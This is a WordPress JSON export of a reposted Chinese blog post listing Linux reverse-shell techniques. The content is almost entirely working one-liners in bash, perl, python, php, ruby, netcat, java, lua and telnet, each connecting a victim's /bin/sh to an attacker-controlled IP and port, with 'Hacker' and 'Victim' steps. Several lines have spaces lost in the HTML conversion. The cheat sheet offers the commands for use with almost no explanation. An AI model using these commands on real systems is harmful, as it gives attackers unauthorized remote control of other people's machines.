{"id":214,"date":"2015-03-07T06:55:40","date_gmt":"2015-03-07T06:55:40","guid":{"rendered":""},"modified":"2015-03-07T06:55:40","modified_gmt":"2015-03-07T06:55:40","slug":"","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=214","title":{"rendered":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5"},"content":{"rendered":"

\n\t<\/span>bash\u7248\u672c\uff1a<\/span>
\n1\tbash-i >& \/dev\/tcp\/10.0.0.1\/80800>&1<\/span>
\n\u6ce8\u610f\u8fd9\u4e2a\u662f\u7531\u89e3\u6790shell\u7684bash\u5b8c\u6210\uff0c\u6240\u4ee5\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4e0d\u652f\u6301<\/span>
\nperl\u7248\u672c:<\/span>
\n1\tperl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“\/bin\/sh -i”);};’<\/span>
\npython\u7248\u672c\uff1a<\/span>
\n1\tpython -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“\/bin\/sh”,”-i”]);’<\/span>
\nphp\u7248\u672c\uff1a<\/span>
\n1\tphp -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“\/bin\/sh -i <&3 >&3 2>&3”);’<\/span>
\nruby\u7248\u672c\uff1a<\/span>
\n1\truby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“\/bin\/sh -i <&%d >&%d 2>&%d”,f,f,f)’<\/span>
\nnc\u7248\u672c\uff1a<\/span>
\n1\tnc -e \/bin\/sh10.0.0.1 1234<\/span>
\n2\trm\/tmp\/f;mkfifo\/tmp\/f;cat\/tmp\/f|\/bin\/sh-i 2>&1|nc 10.0.0.1 1234 >\/tmp\/f<\/span>
\n3\tnc x.x.x.x 8888|\/bin\/sh|nc x.x.x.x 9999<\/span>
\njava\u7248\u672c<\/span>
\n1\tr = Runtime.getRuntime()<\/span>
\n2\tp = r.exec([“\/bin\/bash”,”-c”,”exec 5<>\/dev\/tcp\/10.0.0.1\/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done”] as String[])<\/span>
\n3\tp.waitFor()<\/span>
\nlua\u7248\u672c\uff1a<\/span>
\n1\tlua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘10.0.0.1′,’1234’);os.execute(‘\/bin\/sh -i <&3 >&3 2>&3’);”<\/span>
\nnc\u4e0d\u4f7f\u7528-e\uff1a<\/span>
\n01\tHacker:nc -lvnp listenport<\/span>
\n02\tVictim:mknod\/tmp\/backpipep<\/span>
\n03\tVictim:\/bin\/sh0<\/tmp\/backpipe| nc attackerip listenport 1>\/tmp\/backpipe<\/span>
\n04\t\u4e0d\u4f7f\u7528nc<\/span>
\n05\tMethod 1:<\/span>
\n06\tHacker: nc -nvlpp 8080<\/span>
\n07\tVictim: \/bin\/bash-i > \/dev\/tcp\/173.214.173.151\/80800<&1 2>&1<\/span>
\n08\tMethod 2:<\/span>
\n09\tHacker: nc -nvlpp8080<\/span>
\n10\tVictim: mknodbackpipe p && telnet 173.214.173.151 8080 0backpipe<\/span>
\n11\tMethod 3:<\/span>
\n12\tHacker: nc -nvlpp8080<\/span>
\n13\tHacker: nc -nvlpp8888<\/span>
\n14\tVictim: telnet 173.214.173.151 8080 | \/bin\/bash| telnet 173.214.173.151 8888<\/span>
\n\u53c2\u8003\u6587\u7ae0\uff1a<\/span>
\nhttp:\/\/zone.wooyun.org\/content\/5064<\/span>
\nhttp:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet<\/span>
\n\u672c\u6587\u56fa\u5b9a\u94fe\u63a5: http:\/\/www.waitalone.cn\/linux-shell-rebound-under-way.html | \u72ec\u81ea\u7b49\u5f85-\u4fe1\u606f\u5b89\u5168\u535a\u5ba2<\/span>
\n\u4f5c\u8005\uff1a\u72ec\u81ea\u7b49\u5f85 | \u53d1\u5e03\uff1a2013\u5e7407\u670816\u65e5<\/span>
\n\u5206\u7c7b\uff1a\u6e17\u900f\u6d4b\u8bd5<\/span>
\n\u6807\u7b7e\uff1alinux,shell,\u53cd\u5f39<\/span>
\n\u8f6c\u8f7d\u6587\u7ae0\u8bf7\u6ce8\u660e\uff1aLinux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 | \u72ec\u81ea\u7b49\u5f85-\u4fe1\u606f\u5b89\u5168\u535a\u5ba2<\/span>
\n<\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"

\n\t\"bash\"\n<\/p>\n

\n\tbash\u7248\u672c\uff1a\n<\/p>\n

\n
\n
\n\n\n\n
\n\t\t\t\t\t\t\t1<\/code>\n\t\t\t\t\t\t<\/td>\n\n\t\t\t\t\t\t\tbash<\/code> -i >& <\/code>\/dev\/tcp\/10<\/code>.0.0.1<\/code>\/8080<\/code> 0>&1<\/code>\n\t\t\t\t\t\t<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<\/div>\n

\n\t\u6ce8\u610f\u8fd9\u4e2a\u662f\u7531\u89e3\u6790shell\u7684bash\u5b8c\u6210\uff0c\u6240\u4ee5\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4e0d\u652f\u6301\n<\/p>\n

\n\tperl\u7248\u672c:\n<\/p>\n

\n
\n
\n\n\n\n
\n\t\t\t\t\t\t\t1<\/code>\n\t\t\t\t\t\t<\/td>\n\n\t\t\t\t\t\t\tperl -e <\/code>'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK...<\/code>\n\t\t\t\t\t\t<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[],"class_list":["post-214","post","type-post","status-publish","format-standard","hentry"],"yoast_head":"\n[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 - Wayne's Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=214\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 - Wayne's Blog\" \/>\n<meta property=\"og:description\" content=\"bash\u7248\u672c\uff1a 1 bash -i >& \/dev\/tcp\/10.0.0.1\/8080 0>&1 \u6ce8\u610f\u8fd9\u4e2a\u662f\u7531\u89e3\u6790shell\u7684bash\u5b8c\u6210\uff0c\u6240\u4ee5\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4e0d\u652f\u6301 perl\u7248\u672c: 1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK...\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=214\" \/>\n<meta property=\"og:site_name\" content=\"Wayne's Blog\" \/>\n<meta property=\"article:published_time\" content=\"2015-03-07T06:55:40+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne's Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=214#webpage\",\"url\":\"http:\/\/weizn.net\/?p=214\",\"name\":\"[\\u8f6c] Linux\\u4e0b\\u53cd\\u5f39shell\\u65b9\\u6cd5 - Wayne's Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"datePublished\":\"2015-03-07T06:55:40+00:00\",\"dateModified\":\"2015-03-07T06:55:40+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=214#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=214\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=214#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[\\u8f6c] Linux\\u4e0b\\u53cd\\u5f39shell\\u65b9\\u6cd5\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=214#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=214#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"[\\u8f6c] Linux\\u4e0b\\u53cd\\u5f39shell\\u65b9\\u6cd5\",\"datePublished\":\"2015-03-07T06:55:40+00:00\",\"dateModified\":\"2015-03-07T06:55:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=214#webpage\"},\"wordCount\":314,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=214#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 - Wayne's Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=214","og_locale":"zh_CN","og_type":"article","og_title":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 - Wayne's Blog","og_description":"bash\u7248\u672c\uff1a 1 bash -i >& \/dev\/tcp\/10.0.0.1\/8080 0>&1 \u6ce8\u610f\u8fd9\u4e2a\u662f\u7531\u89e3\u6790shell\u7684bash\u5b8c\u6210\uff0c\u6240\u4ee5\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4e0d\u652f\u6301 perl\u7248\u672c: 1 perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK...","og_url":"http:\/\/weizn.net\/?p=214","og_site_name":"Wayne's Blog","article_published_time":"2015-03-07T06:55:40+00:00","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"2 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne's Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=214#webpage","url":"http:\/\/weizn.net\/?p=214","name":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5 - Wayne's Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"datePublished":"2015-03-07T06:55:40+00:00","dateModified":"2015-03-07T06:55:40+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=214#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=214"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=214#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=214#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=214#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"[\u8f6c] Linux\u4e0b\u53cd\u5f39shell\u65b9\u6cd5","datePublished":"2015-03-07T06:55:40+00:00","dateModified":"2015-03-07T06:55:40+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=214#webpage"},"wordCount":314,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=214#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/214","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=214"}],"version-history":[{"count":0,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/214\/revisions"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=214"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=214"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}